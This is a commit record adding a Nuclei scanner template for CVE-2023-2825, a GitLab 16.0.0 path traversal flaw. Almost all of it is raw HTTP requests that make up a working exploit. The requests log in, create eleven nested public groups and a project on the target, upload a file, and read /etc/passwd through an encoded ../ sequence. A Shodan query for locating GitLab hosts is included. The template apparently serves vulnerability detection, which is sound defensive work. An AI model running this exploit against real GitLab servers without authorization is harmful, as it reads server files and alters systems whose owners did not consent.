Merge pull request #7303 from projectdiscovery/CVE-2023-2825

Create CVE-2023-2825.yaml [GitLab 16.0.0 File Path Traversal] 🔥
patch-1
Ritik Chaddha 2023-05-30 12:11:25 +05:30 committed by GitHub
commit b3c240f8f8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 216 additions and 0 deletions

View File

@ -0,0 +1,216 @@
id: CVE-2023-2825
info:
name: GitLab 16.0.0 - Path Traversal
author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
reference:
- https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
- https://github.com/Occamsec/CVE-2023-2825
- https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2825
classification:
cve-id: CVE-2023-2825
metadata:
verified: "true"
shodan-query: title:"Gitlab"
tags: cve,cve2023,gitlab,lfi,kev,authenticated
variables:
data: '{{rand_base(5)}}'
http:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
- |
POST /users/sign_in HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: */*
user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: */*
group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
@timeout: 15s
POST /projects HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
- |
POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
Host: {{Hostname}}
Accept: */*
X-CSRF-Token: {{x-csrf-token}}
Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6
--0ce2a9fbe06b6da89c138a35a1765ed6
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
{{randstr}}
--0ce2a9fbe06b6da89c138a35a1765ed6--
- |
GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
Accept: */*
host-redirects: true
cookie-reuse: true
extractors:
- type: regex
part: body
name: token_1
group: 1
regex:
- 'name="authenticity_token" value="([A-Za-z0-9_-]+)"'
internal: true
- type: regex
part: body
name: token_2
group: 1
regex:
- 'name="csrf\-token" content="([A-Z_0-9a-z-]+)"'
internal: true
- type: regex
part: body
name: parent_id
group: 1
regex:
- 'href="\/groups\/new\?parent_id=([0-9]+)'
internal: true
- type: regex
part: body
name: namespace_id
group: 1
regex:
- 'ref="\/projects\/new\?namespace_id=([0-9]+)'
internal: true
- type: regex
part: body
name: x-csrf-token
group: 1
regex:
- 'const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"'
internal: true
- type: regex
part: body
name: upload-hash
group: 1
regex:
- '"url":"\/uploads\/([0-9a-z]+)\/'
internal: true
matchers-condition: and
matchers:
- type: word
encoding: hex
words:
- "726f6f743a78"
- type: word
part: header
words:
- "application/octet-stream"
- "etc%2Fpasswd"
condition: and